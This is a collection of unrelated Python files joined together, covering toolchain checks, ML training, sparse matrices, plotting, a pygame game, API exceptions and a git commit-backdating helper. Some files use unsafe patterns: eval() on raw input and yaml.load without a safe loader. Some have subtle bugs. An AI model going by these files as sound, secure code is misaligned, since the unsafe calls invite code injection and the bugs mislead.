This function will populate toolchain version.
"""
def GettoolchainVersion(inVersionCommand):
import subprocess
p = subprocess.Popen(inVersionCommand.split(), stdout=subprocess.PIPE)
toolchainVersion = p.communicate()[0].rstrip()
return toolchainVersion
"""
This function will return absolute path of toolchain.
If the path comes out to be empty then exit with error.
"""
def customWhich(command):
absCommand = which(command)
if absCommand == "":
Exit("Command: " + command + " does not exist")
return absCommand
"""
This function will check
lto_state and ARM_GCC toolchain version
______________________
lto_state | required |
| version |
----------------------
n/<empty> | >= 4.9.3 |
----------------------
y | 4.9.3 |
----------------------
"""
def ARM_GCCCheck(inOpts):
toolchain = "arm-none-eabi-gcc"
lto_state = inOpts.lto_state[0]
versionCommand = " ".join([customWhich(toolchain), "-dumpversion"])
"""
Dots from the string are removed (using replace method) for comparision purpose
"""
toolchainVersion = GettoolchainVersion(versionCommand).replace(".", "")
if ((lto_state == "n") or (lto_state == "")) and (toolchainVersion < "493"):
str = ["Please use 4.9.3 or higher version", toolchain]
Exit(" ".join(str))
elif (lto_state == "y") and (toolchainVersion != "493"):
str = ["Please use 4.9.3 only version", toolchain]
Exit(" ".join(str))
def VersionCheck(inOpts):
if inOpts.toolchain[0] == "arm_gcc":
ARM_GCCCheck(inOpts)
elif inOpts.toolchain[0] != "iar":
Exit("Incorrect toolchain selected")
def ArchNameCheck(inOpts):
if inOpts.arch_name[0] not in ['mc200', 'mw300']:
Exit("Incorrect arch_name selected");
def ValueCheck(inValue, inValueName):
if inValue is None:
Exit("Please specify " + inValueName)
def OptsCheck(inOpts):
ValueCheck(inOpts.toolchain, "toolchain")
ValueCheck(inOpts.lto_state, "lto_state")
ValueCheck(inOpts.arch_name, "arch_name")
def main():
parser = argparse.ArgumentParser(description='This will check toolchain version')
parser.add_argument("-V", "--version",
action="version",
version="%(prog)s v1.0")
checker = parser.add_argument_group()
checker.add_argument("-t", "--toolchain",
action="store",
nargs=1,
dest="toolchain",
help="Specify toolchain")
checker.add_argument("-l", "--lto_state",
action="store",
nargs=1,
dest="lto_state",
help="Specify lto_state")
checker.add_argument("-a", "--arch_name",
action="store",
nargs=1,
dest="arch_name",
help="Specify arch_name")
opts, unknown = parser.parse_known_args()
if len(sys.argv) == 1:
parser.print_help()
parser.exit(1)
OptsCheck(opts)
ArchNameCheck(opts)
VersionCheck(opts)
if __name__ == '__main__':
main()
|
from . import Plugin
from jinja2 import Template
class ConsolePrint(Plugin):
def __init__(self, *, config):
self.content_tmpl = Template(config.get("content", ""))
def execute(self, vote):
rendered = self.content_tmpl.render(vote.__dict__)
print(rendered) |
import caffe
import numpy as np
import pdb
class MyLossLayer(caffe.Layer):
"""Layer of Efficient Siamese loss function."""
def setup(self, bottom, top):
self.margin = 10
print '*********************** SETTING UP'
pass
def forward(self, bottom, top):
"""The parameters here have the same meaning as data_layer"""
self.Num = 0
batch = 1
level = 5
dis = 9
SepSize = batch*level
self.dis = []
# for the first
for k in range(dis):
for i in range(SepSize*k,SepSize*(k+1)-batch):
for j in range(SepSize*k + int((i-SepSize*k)/batch+1)*batch,SepSize*(k+1)):
self.dis.append(bottom[0].data[i]-bottom[0].data[j])
self.Num +=1
self.dis = np.asarray(self.dis)
self.loss = np.maximum(0,self.margin-self.dis) # Efficient Siamese forward pass of hinge loss
top[0].data[...] = np.sum(self.loss)/bottom[0].num
def backward(self, top, propagate_down, bottom):
"""The parameters here have the same meaning as data_layer"""
batch=1
index = 0
level = 5
dis = 9
SepSize = batch*level
self.ref= np.zeros(bottom[0].num,dtype=np.float32)
for k in range(dis):
for i in range(SepSize*k,SepSize*(k+1)-batch):
for j in range(SepSize*k + int((i-SepSize*k)/batch+1)*batch,SepSize*(k+1)):
if self.loss[index]>0:
self.ref[i] += -1
self.ref[j] += +1
index +=1
# Efficient Siamese backward pass
bottom[0].diff[...]= np.reshape(self.ref,(bottom[0].num,1))/bottom[0].num
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
top[0].reshape(1)
|
"""Application Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .StaffCheckout import StaffCheckout
from .Files import Files
class CartPosCheckoutDetailRequest(BaseSchema):
# PosCart swagger.json
callback_url = fields.Str(required=False)
payment_identifier = fields.Str(required=False)
meta = fields.Dict(required=False)
ordering_store = fields.Int(required=False)
payment_mode = fields.Str(required=False)
pick_at_store_uid = fields.Int(required=False)
staff = fields.Nested(StaffCheckout, required=False)
extra_meta = fields.Dict(required=False)
payment_params = fields.Dict(required=False)
merchant_code = fields.Str(required=False)
pos = fields.Boolean(required=False)
aggregator = fields.Str(required=False)
fyndstore_emp_id = fields.Str(required=False)
delivery_address = fields.Dict(required=False)
files = fields.List(fields.Nested(Files, required=False), required=False)
billing_address = fields.Dict(required=False)
address_id = fields.Str(required=False)
payment_auto_confirm = fields.Boolean(required=False)
order_type = fields.Str(required=False)
billing_address_id = fields.Str(required=False)
|
import numpy as np
import scipy.sparse
from scipy.sparse import spmatrix, coo_matrix, sputils
from .base import _formats
from .cic import cic_matrix
from .cir import cir_matrix
from .vsb import vsb_matrix
from .util import nbytes
class cvb_matrix(spmatrix):
"""
Circulant Vertical Block matrix
Stores the first block as a sparse matrix.
"""
format = 'cvb'
def __init__(self, arg1, shape, dtype=None):
super().__init__()
self._shape = shape
self.block, self.shift = arg1
# if not (isinstance(self.block, (cic_matrix, cir_matrix))):
# raise NotImplementedError("TODO")
assert self.block.shape[1] == shape[1]
assert shape[0]%self.block.shape[0] == 0
self.n_blocks = self.shape[0]//self.block.shape[0]
self.dtype = self.block.dtype
# TODO: slicing
def __repr__(self):
format = _formats[self.getformat()][1]
return (
f"<{self.shape[0]}x{self.shape[1]} sparse matrix of type"
f" '{self.dtype.type}'\n\twith {self.nnz} stored elements in {format}"
" format>"
)
def getnnz(self):
return self.block.getnnz()
def count_nonzero(self):
return self.block.count_nonzero()*self.n_blocks
@property
def nbytes(self):
return nbytes(self.block)
def transpose(self, axes=None, copy=False):
from .chb import chb_matrix
if axes is None:
return chb_matrix((self.block.T, self.shift), self.shape[::-1], self.dtype)
else:
return super().transpose(axes=axes, copy=copy)
def tocoo(self, copy=False):
"""
Slow.
"""
return scipy.sparse.vstack([self.get_block(i) for i in range(self.n_blocks)])
def tovsb(self, copy=False):
return vsb_matrix([self.get_block(i) for i in range(self.n_blocks)])
def get_block(self, i=0):
if i == 0:
return self.block
elif isinstance(self.block, cir_matrix):
return cir_matrix(
(self.block.data, self.block.offsets + i*self.shift, self.block.shift),
self.block.shape,
self.block.dtype
)
# elif isinstance(self.block, cir_matrix):
# raise NotImplementedError("TODO")
else:
coo = self.block.tocoo()
return coo_matrix(
(coo.data, (coo.row, (coo.col + i*self.shift)%coo.shape[1])),
coo.shape,
coo.dtype
)
def _mul_vector(self, other):
x = np.ravel(other)
y = np.zeros(
self.shape[0], dtype=sputils.upcast_char(self.dtype.char, other.dtype.char)
)
if self.shift == 0:
y0 = self.block @ x
for i in range(self.n_blocks):
y[i*len(y0):(i + 1)*len(y0)] = y0
return y
n0 = self.block.shape[0]
period = min(self.n_blocks, abs(np.lcm(self.shift, self.shape[1])//self.shift))
xr = np.empty_like(x)
for i in range(period):
# Equivalent to `xr = np.roll(x, -i*self.shift)``, but faster
offset = -i*self.shift
if offset == 0:
xr[:] = x
else:
xr[:offset] = x[-offset:]
xr[offset:] = x[:-offset]
y[i*n0:(i + 1)*n0] += self.block @ xr
row_period = n0*period
y0 = y[:row_period]
for i in range(row_period, self.shape[0], row_period):
y[i:i + row_period] = y0[:len(y) - i]
return y
def _mul_multivector(self, other):
y = np.zeros(
(self.shape[0], other.shape[1]),
dtype=sputils.upcast_char(self.dtype.char, other.dtype.char)
)
if self.shift == 0:
y0 = self.block @ other
for i in range(self.n_blocks):
y[i*len(y0):(i + 1)*len(y0)] = y0
return y
n0 = self.block.shape[0]
period = min(self.n_blocks, abs(np.lcm(self.shift, self.shape[1])//self.shift))
xr = np.empty_like(other)
for i in range(period):
# Equivalent to `xr = np.roll(other, -i*self.shift, axis=0)`, but faster
offset = -i*self.shift
if offset == 0:
xr[:] = other
else:
xr[:offset] = other[-offset:]
xr[offset:] = other[:-offset]
y[i*n0:(i + 1)*n0] += self.block @ xr
row_period = n0*period
y0 = y[:row_period]
for i in range(row_period, self.shape[0], row_period):
y[i:i + row_period] = y0[:len(y) - i]
return y
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Script to visualize neuron firings.
#
import sys, os
import numpy as np
import time
import pickle
import py_reader # reader utility for opendihu *.py files
show_plot = True
# import needed packages from matplotlib
import matplotlib as mpl
if not show_plot:
mpl.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import animation
from matplotlib import cm
from matplotlib.patches import Polygon
import matplotlib.gridspec as gridspec
# get all input data in current directory
filenames = os.listdir("out")
# collect the filenames
condition = lambda filename: ".py" in filename and "muscle_spindles" in filename
muscle_spindles_files = ["out/{}".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]
condition = lambda filename: ".py" in filename and "golgi_tendon_organs" in filename
golgi_tendon_organs_files = ["out/{}".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]
condition = lambda filename: ".py" in filename and "interneurons" in filename
interneurons_files = ["out/{}".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]
condition = lambda filename: ".py" in filename and "motoneurons" in filename
motoneurons_files = ["out/{}".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]
print("Number of input files: muscle spindles: {}, golgi tendon organs: {}, interneurons: {}, motoneurons: {}".\
format(len(muscle_spindles_files), len(golgi_tendon_organs_files), len(interneurons_files), len(motoneurons_files)))
# load data
muscle_spindles_data = py_reader.load_data(muscle_spindles_files)
golgi_tendon_organs_data = py_reader.load_data(golgi_tendon_organs_files)
interneurons_data = py_reader.load_data(interneurons_files)
motoneurons_data = py_reader.load_data(motoneurons_files)
# create plots
fig,axes = plt.subplots(4,1,figsize=(12,8),sharex=True)
# ---------------------
# plot muscle spindles
component_name_input = "(P)modell/L"
component_name_output = "modell/primary_afferent"
t_values = None
values_output = None
values_input = None
# loop over datasets at different times
for i,dataset in enumerate(muscle_spindles_data):
# get the data for the current timestep
data_input = py_reader.get_values(dataset, "parameters", component_name_input)
data_output = py_reader.get_values(dataset, "algebraics", component_name_output)
if data_input is None:
print("No (input) data found for muscle spindles or component '{}' does not exist.\n".format(component_name_input))
if data_output is None:
print("No (output) data found for muscle spindles or component '{}' does not exist.\n".format(component_name_output))
# create arrays the first time
if values_output is None:
values_input = np.zeros((len(data_output), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons
values_output = np.zeros((len(data_output), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons
t_values = np.zeros((len(muscle_spindles_data)))
# store values
values_input[:,i] = data_input
values_output[:,i] = data_output
t_values[i] = dataset['currentTime']
# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
color = next(axes[0]._get_lines.prop_cycler)['color']
axes[0].plot(t_values, values_output[i,:], '-', color=color)
if i == 0:
ax2 = axes[0].twinx()
ax2.plot(t_values, values_input[i,:], ':', color=color)
# set title and axis labels
axes[0].set_title('Muscle spindles (number: {})'.format(n))
axes[0].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')
# ---------------------
# plot Golgi tendon organs
component_name_input = "(P)membrane/i_Stim"
component_name_output = "membrane/V"
t_values = None
values_input = None
values_output = None
# loop over datasets at different times
for i,dataset in enumerate(golgi_tendon_organs_data):
# get the data for the current timestep
data_input = py_reader.get_values(dataset, "parameters", component_name_input)
data_output = py_reader.get_values(dataset, "solution", component_name_output)
if data_input is None:
print("No data found for Golgi tendon organs or component '{}' does not exist.\n".format(component_name_input))
if data_output is None:
print("No data found for Golgi tendon organs or component '{}' does not exist.\n".format(component_name_output))
# create arrays the first time
if values_output is None:
values_input = np.zeros((len(data_output), len(golgi_tendon_organs_data))) # each column is the data for one timestep, for multiple neurons
values_output = np.zeros((len(data_output), len(golgi_tendon_organs_data))) # each column is the data for one timestep, for multiple neurons
t_values = np.zeros((len(golgi_tendon_organs_data)))
# store values
values_input[:,i] = data_input
values_output[:,i] = data_output
t_values[i] = dataset['currentTime']
# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
color = next(axes[1]._get_lines.prop_cycler)['color']
axes[1].plot(t_values, values_output[i,:], '-', color=color)
if i == 0:
ax2 = axes[1].twinx()
ax2.plot(t_values, values_input[i,:], ':', color=color)
# set title and axis labels
axes[1].set_title('Golgi tendon organs (number: {})'.format(n))
axes[1].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')
# ---------------------
# plot interneurons
component_name_input = "(P)membrane/i_Stim"
component_name_output = "membrane/V"
t_values = None
values_output = None
values_input = None
# loop over datasets at different times
for i,dataset in enumerate(interneurons_data):
# get the data for the current timestep
data_input = py_reader.get_values(dataset, "parameters", component_name_input)
data_output = py_reader.get_values(dataset, "solution", component_name_output)
if data_input is None:
print("No data found for interneurons or component '{}' does not exist.\n".format(component_name_input))
if data_output is None:
print("No data found for interneurons or component '{}' does not exist.\n".format(component_name_output))
# create arrays the first time
if values_output is None:
values_input = np.zeros((len(data_output), len(interneurons_data))) # each column is the data for one timestep, for multiple neurons
values_output = np.zeros((len(data_output), len(interneurons_data))) # each column is the data for one timestep, for multiple neurons
t_values = np.zeros((len(interneurons_data)))
# store values
values_input[:,i] = data_input
values_output[:,i] = data_output
t_values[i] = dataset['currentTime']
# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
color = next(axes[2]._get_lines.prop_cycler)['color']
axes[2].plot(t_values, values_output[i,:], '-', color=color)
if i == 0:
ax2 = axes[2].twinx()
ax2.plot(t_values, values_input[i,:], ':', color=color)
# set title and axis labels
axes[2].set_title('Interneurons (number: {})'.format(n))
axes[2].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')
# ---------------------
# plot motoneurons
component_name_input = "(P)motor_neuron/drive"
component_name_output = "motor_neuron/V_s"
t_values = None
values_output = None
values_input = None
# loop over datasets at different times
for i,dataset in enumerate(motoneurons_data):
# get the data for the current timestep
data_input = py_reader.get_values(dataset, "parameters", component_name_input)
data_output = py_reader.get_values(dataset, "solution", component_name_output)
if data_input is None:
print("No data found for motoneurons or component '{}' does not exist.\n".format(component_name_input))
if data_output is None:
print("No data found for motoneurons or component '{}' does not exist.\n".format(component_name_output))
# create arrays the first time
if values_output is None:
values_input = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons
values_output = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons
t_values = np.zeros((len(motoneurons_data)))
# store values
values_input[:,i] = data_input
values_output[:,i] = data_output
t_values[i] = dataset['currentTime']
# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
color = next(axes[3]._get_lines.prop_cycler)['color']
axes[3].plot(t_values, values_output[i,:], '-', color=color)
if i == 0:
ax2 = axes[3].twinx()
ax2.plot(t_values, values_input[i,:], ':', color=color)
# set title and axis labels
axes[3].set_title('Motor neurons (number: {})'.format(n))
axes[3].set_xlabel('time [ms]')
axes[3].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')
# show plot window
plt.savefig("plot.png")
plt.show()
|
class SabreClientError(Exception):
pass
# Authentication requested, but no credentials (client ID, client secret) provided
class NoCredentialsProvided(SabreClientError):
pass
# Did not request token
class NotAuthorizedError(SabreClientError):
pass
class UnsupportedMethodError(SabreClientError):
pass
class InvalidInputError(SabreClientError):
pass
# Base API Exception
class SabreDevStudioAPIException(Exception):
def __init__(self, e=None):
if isinstance(e, dict):
message = e.get('message')
super(SabreDevStudioAPIException, self).__init__(message)
self.message = message
self.status = e.get('status')
self.error_code = e.get('errorCode')
self.e_type = e.get('type')
self.tstamp = e.get('timeStamp')
elif isinstance(e, str):
self.message = e
else:
super(SabreDevStudioAPIException, self).__init__()
def __unicode__(self):
if self.message and self.status:
str += 'Message:\t' + self.message + '\n'
str += 'Status:\t' + self.status + '\n'
str += 'Error Code:\t' + self.error_code + '\n'
str += 'Type:\t' + self.type + '\n'
str += 'Timestamp:\t' + self.timestamp + '\n'
return str
elif self.message:
return self.message
else:
return "<" + self.__class__.__name__ + ">"
# 400
class SabreErrorBadRequest(SabreDevStudioAPIException):
pass
# 401
class SabreErrorUnauthorized(SabreDevStudioAPIException):
pass
# 403
class SabreErrorForbidden(SabreDevStudioAPIException):
pass
# 404
class SabreErrorNotFound(SabreDevStudioAPIException):
pass
# 404
class SabreErrorMethodNotAllowed(SabreDevStudioAPIException):
pass
# 406
class SabreErrorNotAcceptable(SabreDevStudioAPIException):
pass
# 429
class SabreErrorRateLimited(SabreDevStudioAPIException):
pass
# 500
class SabreInternalServerError(SabreDevStudioAPIException):
pass
# 503
class SabreErrorServiceUnavailable(SabreDevStudioAPIException):
pass
# 504
class SabreErrorGatewayTimeout(SabreDevStudioAPIException):
pass
class SabreErrorUnauthenticated(SabreDevStudioAPIException):
pass |
import pygame as p
from asset_loader import AssetLoader
from enemy import Enemy
from player import Player
class GameState():
WIN_WIDTH = 500
WIN_HEIGHT = 480
def __init__(self):
p.init()
p.display.set_caption("First Platformer Game")
self.win = p.display.set_mode((self.WIN_WIDTH, self.WIN_HEIGHT))
self.player = Player()
self.enemy = Enemy()
asset_loader = AssetLoader()
self.bg = asset_loader.load_background()
self.music = asset_loader.load_music()
self.music.play(-1)
self.score = 0
self.clock = p.time.Clock()
def update(self):
run = True
while run:
self.win.blit(self.bg, (0, 0))
self.clock.tick(60)
for event in p.event.get():
if event.type == p.QUIT:
run = False
self.player.update(self.win)
self.enemy.update(self.win)
self._check_collision()
self._display_score()
p.display.update()
def _check_collision(self):
"""
1. check collision between enemy vs player
2. check collision between enemy vs player bullets
"""
enemy_collided = self.player.hitbox.collide(self.enemy.hitbox)
if enemy_collided:
self.player.health -= 1
print('player vs enemy hit') # reduce health of the player
bullets = self.player.bullets
for bullet in bullets:
bullet_hit = bullet.hitbox.collide(self.enemy.hitbox)
if bullet_hit:
bullets.remove(bullet)
self.score += 1
self.enemy.health -= 1
print('bullet hit vs enemy')
def _display_score(self):
font = p.font.SysFont('comicsans', 30, True)
text = font.render('Score: ' + str(self.score), 1, (0, 0, 0))
self.win.blit(text, (390, 10))
if __name__ == '__main__':
game = GameState()
game.update()
|
import re
exp = input().lstrip('0')
refined_exp = re.sub(r'\D0+\d', lambda x: x.group(0)[:-1].replace('0', '') + x.group(0)[-1], exp)
terms = refined_exp.split('-')
v = []
if(len(terms) == 1):
print(eval(terms[0]))
else:
for i in terms[1:]:
v.append(eval(i))
res = eval(terms[0]) - sum(v)
print(res)
|
#! -*- coding:utf-8 -*-
# 语义相似度任务:数据集xnli, 从train中切分了valid
# loss: concat后走3分类,CrossEntropyLoss
from bert4torch.tokenizers import Tokenizer
from bert4torch.models import build_transformer_model, BaseModel
from bert4torch.snippets import sequence_padding, Callback, ListDataset
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
maxlen = 256
batch_size = 12
config_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/bert_config.json'
checkpoint_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/pytorch_model.bin'
dict_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/vocab.txt'
label2id = {"contradictory": 0, "entailment": 1, "neutral": 2}
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# 建立分词器
tokenizer = Tokenizer(dict_path, do_lower_case=True)
def collate_fn(batch):
batch_token1_ids, batch_token2_ids, batch_labels = [], [], []
for text1, text2, label in batch:
token1_ids, _ = tokenizer.encode(text1, maxlen=maxlen)
batch_token1_ids.append(token1_ids)
token2_ids, _ = tokenizer.encode(text2, maxlen=maxlen)
batch_token2_ids.append(token2_ids)
batch_labels.append([label])
batch_token1_ids = torch.tensor(sequence_padding(batch_token1_ids), dtype=torch.long, device=device)
batch_token2_ids = torch.tensor(sequence_padding(batch_token2_ids), dtype=torch.long, device=device)
batch_labels = torch.tensor(batch_labels, dtype=torch.long, device=device)
return (batch_token1_ids, batch_token2_ids), batch_labels.flatten()
# 加载数据集
def get_data(filename):
train_data, dev_data = [], []
with open(filename, encoding='utf-8') as f:
for row, l in enumerate(f):
if row == 0: # 跳过首行
continue
text1, text2, label = l.strip().split('\t')
if row % 100 == 0:
dev_data.append((text1, text2, label2id[label]))
else:
train_data.append((text1, text2, label2id[label]))
return train_data, dev_data
train_data, dev_data = get_data('F:/Projects/data/corpus/sentence_embedding/XNLI-MT-1.0/multinli/multinli.train.zh.tsv')
train_dataloader = DataLoader(ListDataset(data=train_data), batch_size=batch_size, shuffle=True, collate_fn=collate_fn)
valid_dataloader = DataLoader(ListDataset(data=dev_data), batch_size=batch_size, collate_fn=collate_fn)
# 定义bert上的模型结构
class Model(BaseModel):
def __init__(self, pool_method='mean', concatenation_sent_rep=True, concatenation_sent_difference=True, concatenation_sent_multiplication=False):
super().__init__()
self.bert, self.config = build_transformer_model(config_path=config_path, checkpoint_path=checkpoint_path, with_pool=True, return_model_config=True, segment_vocab_size=0)
self.pool_method = pool_method
self.concatenation_sent_rep = concatenation_sent_rep
self.concatenation_sent_difference = concatenation_sent_difference
self.concatenation_sent_multiplication = concatenation_sent_multiplication
hidden_unit = 0
hidden_unit += 768*2 if self.concatenation_sent_rep else 0
hidden_unit += 768 if self.concatenation_sent_difference else 0
hidden_unit += 768 if self.concatenation_sent_multiplication else 0
self.fc = nn.Linear(hidden_unit, len(label2id))
def forward(self, token1_ids, token2_ids):
hidden_state1, pool_cls1 = self.bert([token1_ids])
rep_a = self.get_pool_emb(hidden_state1, pool_cls1, attention_mask=token1_ids.gt(0).long())
hidden_state2, pool_cls2 = self.bert([token2_ids])
rep_b = self.get_pool_emb(hidden_state2, pool_cls2, attention_mask=token2_ids.gt(0).long())
vectors_concat = []
if self.concatenation_sent_rep:
vectors_concat.append(rep_a)
vectors_concat.append(rep_b)
if self.concatenation_sent_difference:
vectors_concat.append(torch.abs(rep_a - rep_b))
if self.concatenation_sent_multiplication:
vectors_concat.append(rep_a * rep_b)
vectors_concat = torch.cat(vectors_concat, dim=1)
return self.fc(vectors_concat)
def get_pool_emb(self, hidden_state, pool_cls, attention_mask):
if self.pool_method == 'cls':
return pool_cls
elif self.pool_method == 'mean':
hidden_state = torch.sum(hidden_state * attention_mask[:, :, None], dim=1)
attention_mask = torch.sum(attention_mask, dim=1)[:, None]
return hidden_state / attention_mask
elif self.pool_method == 'max':
seq_state = hidden_state * attention_mask[:, :, None]
return torch.max(seq_state, dim=1)
else:
raise ValueError('pool_method illegal')
model = Model().to(device)
# 定义使用的loss和optimizer,这里支持自定义
model.compile(
loss=nn.CrossEntropyLoss(),
optimizer=optim.Adam(model.parameters(), lr=2e-5), # 用足够小的学习率
)
# 定义评价函数
def evaluate(data):
total, right = 0., 0.
for x_true, y_true in data:
y_pred = model.predict(x_true).argmax(axis=1) # 这里取不取softmax不影响结果
total += len(y_true)
right += (y_true == y_pred).sum().item()
return right / total
class Evaluator(Callback):
"""评估与保存
"""
def __init__(self):
self.best_val_acc = 0.
def on_epoch_end(self, global_step, epoch, logs=None):
val_acc = evaluate(valid_dataloader)
if val_acc > self.best_val_acc:
self.best_val_acc = val_acc
# model.save_weights('best_model.pt')
print(f'val_acc: {val_acc:.5f}, best_val_acc: {self.best_val_acc:.5f}\n')
if __name__ == '__main__':
evaluator = Evaluator()
model.fit(train_dataloader,
epochs=20,
steps_per_epoch=300,
callbacks=[evaluator]
)
else:
model.load_weights('best_model.pt')
|
"""Exploring more than 20000 runs may slow down *pypet*.
HDF5 has problems handling nodes with more than 10000 children.
To overcome this problem, simply group your runs into buckets or sets
using the `$set` wildcard.
"""
__author__ = 'Robert Meyer'
import os # To allow file paths working under Windows and Linux
from pypet import Environment
from pypet.utils.explore import cartesian_product
def multiply(traj):
"""Example of a sophisticated simulation that involves multiplying two values."""
z = traj.x * traj.y
# Since we perform many runs we will group results into sets of 1000 each
# using the `$set` wildcard
traj.f_add_result('$set.$.z', z, comment='Result of our simulation '
'sorted into buckets of '
'1000 runs each!')
def main():
# Create an environment that handles running
filename = os.path.join('hdf5','example_18.hdf5')
env = Environment(trajectory='Multiplication',
filename=filename,
file_title='Example_18_Many_Runs',
overwrite_file=True,
comment='Contains many runs',
multiproc=True,
use_pool=True,
freeze_input=True,
ncores=2,
wrap_mode='QUEUE')
# The environment has created a trajectory container for us
traj = env.trajectory
# Add both parameters
traj.f_add_parameter('x', 1, comment='I am the first dimension!')
traj.f_add_parameter('y', 1, comment='I am the second dimension!')
# Explore the parameters with a cartesian product, yielding 2500 runs
traj.f_explore(cartesian_product({'x': range(50), 'y': range(50)}))
# Run the simulation
env.run(multiply)
# Disable logging
env.disable_logging()
# turn auto loading on, since results have not been loaded, yet
traj.v_auto_load = True
# Use the `v_idx` functionality
traj.v_idx = 2042
print('The result of run %d is: ' % traj.v_idx)
# Now we can rely on the wildcards
print(traj.res.crunset.crun.z)
traj.v_idx = -1
# Or we can use the shortcuts `rts_X` (run to set) and `r_X` to get particular results
print('The result of run %d is: ' % 2044)
print(traj.res.rts_2044.r_2044.z)
if __name__ == '__main__':
main() |
import json
import yaml
with open('input.json') as js:
data = json.load(js)
with open('output.yaml', 'w') as yml:
yaml.dump(data, yml, default_flow_style=False, allow_unicode=True)
with open('input.yml') as yml:
data = yaml.load(yml)
with open('output.json', 'w') as js:
js.write(json.dumps(data))
|
from collections import defaultdict
import lib
from clustering import *
import numpy as np
def solve_13(graph, houses, infra, speed=40):
infra_len_paths = defaultdict()
objRoutes = {}
for obj in infra:
routes = lib.getFromSingleToManyPaths(graph, obj, houses, speed)
length = sum(route['length'] for route in routes.values())
infra_len_paths[obj] = length
routes = [route['route'] for route in routes.values()]
objRoutes[obj] = routes
id_min_length = min(infra_len_paths, key=infra_len_paths.get)
return {
'id': id_min_length,
'length': infra_len_paths[id_min_length],
'routes': objRoutes[id_min_length]
}
def solve_14(graph, houses, infra, speed=40):
infra_len_paths = defaultdict()
infra_weight_tree = defaultdict()
objTree = {}
for obj in infra:
routes = lib.getFromSingleToManyPaths(graph, obj, houses, speed)
length = sum(route['length'] for route in routes.values())
infra_len_paths[obj] = length
routes = [route['route'] for route in routes.values()]
tree = lib.routes_to_tree(graph, routes)
objTree[obj] = tree
infra_weight_tree[obj] = tree['weight']
id_min_weight = min(infra_weight_tree, key=infra_weight_tree.get)
return {
'id': id_min_weight,
'weight': infra_weight_tree[id_min_weight],
'tree': objTree[id_min_weight]
}
def solve_21(graph, houses, infra, speed=40):
routes = lib.getFromSingleToManyPaths(graph, infra, houses, speed)
paths_length = sum(route['length'] for route in routes.values())
routes = [route['route'] for route in routes.values()]
tree = lib.routes_to_tree(graph, routes)
print(f"infra: {infra}, paths len= {paths_length}, tree weight= {tree['weight']}")
return {
'id': infra,
'pathsLengthSum': paths_length,
'treeLength': tree['weight'],
'treeEdges': tree['edges'] # set of edges (id1, id2)
}
def solve_22_24(graph, houses, infra, k, speed=40):
# 2.2)
houses_coords = np.array([(graph.nodes[h]['y'], graph.nodes[h]['x']) for h in houses])
dist_matrix = np.array([[get_distance(p[0], p[1], pp[0], pp[1]) for pp in houses_coords] for p in houses_coords])
plot_dendrogram(dist_matrix, houses, truncate_mode='level')
model = get_clusters(dist_matrix, k=k)
centroids = []
trees = []
lengths = []
for c in range(k):
# 2.3 a)
cluster_coords = houses_coords[model.labels_ == c]
cluster = np.array(houses)[model.labels_ == c]
centroids.append(cluster[get_centroid(cluster_coords)])
# 2.3 c,d)
routes = lib.getFromSingleToManyPaths(graph, centroids[-1], cluster, speed)
paths_length = sum(route['length'] for route in routes.values())
routes = [route['route'] for route in routes.values()]
tree = lib.routes_to_tree(graph, routes)
trees.append(tree)
lengths.append(paths_length)
# 2.3 b)
routes = lib.getFromSingleToManyPaths(graph, infra, centroids, speed)
paths_length = sum(route['length'] for route in routes.values())
routes = [route['route'] for route in routes.values()]
tree = lib.routes_to_tree(graph, routes)
intTrees = list(map(
lambda tree: {
"edges": list(map(
lambda edge: [int(edge[0]), int(edge[1])],
tree['edges']
)),
"weight": tree["weight"]
},
trees
))
return {
'centroidTree': tree, # 2.3b
'centroidLength': paths_length, # 2.3b (suddenly need)
'clusterTrees': intTrees, # 2.3cd
'clusterLengths': lengths, # 2.3cd
'centroids': list(map(int, centroids)) # 2.3a
}
|
import datetime
import os
from datetime import date
from pathlib import Path
from typing import List, Tuple
import numpy as np
from fire import Fire
from git import Repo, Actor
from alphabet_matrix import word_matrix, week_count_for_group
def create_repo(repo_dir):
# type: (Path) -> Repo
if not repo_dir.exists():
repo_dir.mkdir(exist_ok=True)
os.chdir(str(repo_dir))
repo = Repo.init(str(repo_dir))
print('Create new repo under {}'.format(repo_dir))
return repo
def create_commit(repo, commit_filename, name, email, commit_date):
# type: (Repo, str, str, str, date) -> None
# commit_file = Path(repo.working_dir) / commit_filename
with open(commit_filename, 'a') as fw:
fw.write('dd')
fw.close()
action_date = commit_date.strftime("%Y-%m-%dT%H:%M:%S")
os.environ["GIT_AUTHOR_DATE"] = action_date
os.environ["GIT_COMMITTER_DATE"] = action_date
repo.git.add(commit_filename)
actor = Actor(name, email=email)
repo.index.commit("commit", author=actor)
